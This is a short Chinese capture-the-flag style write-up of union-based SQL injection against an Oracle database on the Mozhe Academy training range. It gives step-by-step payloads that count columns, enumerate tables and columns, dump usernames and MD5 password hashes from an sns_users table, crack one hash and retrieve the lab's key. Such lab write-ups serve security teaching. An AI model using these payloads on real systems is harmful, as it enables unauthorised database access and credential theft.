oracle注入

使用的是墨者学院的靶场
使用?id=2-1可以看到是数字型
使用order by来测试字段数
可以看到order by 2正常显示

order by 3不显示

可以确定一共使用的是两列，这时测试回显点
payload：?id=-1 union select 'null','null' from dual

两个都显示，那就先模糊查询user表
payload：?id=-1 union select (select table_name from user_tables where table_name like '%user%' ),'null' from dual

查询第一个列名
payload：-1 union select (select column_name from user_tab_columns where table_name='sns_users' and rownum=1),'null' from dual

查询第二个列名
payload：-1 union select (select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name not in 'USER_NAME'),'null' from dual

查询数据
payload：-1 union select USER_PWD,USER_NAME from "sns_users" where rownum=1

得到用户名zhong，密码1c63129ae9asc60asdua94d3e00495看着像MD5加密，但是只有30位肯定不对，继续找
payload：-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME not in 'zhong'

账号：hu，密码1c63129ae9db9g20asdua94d3e00495也不对，继续
payload：-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME not in ('zhong','hu')

这就对了！账号mozhe，密码d2bcc7dc1defad59e8212a7f394717e7，拿去MD5解密904775

登录拿到KEYmozhed1c1fa77f3467a4443c90902b59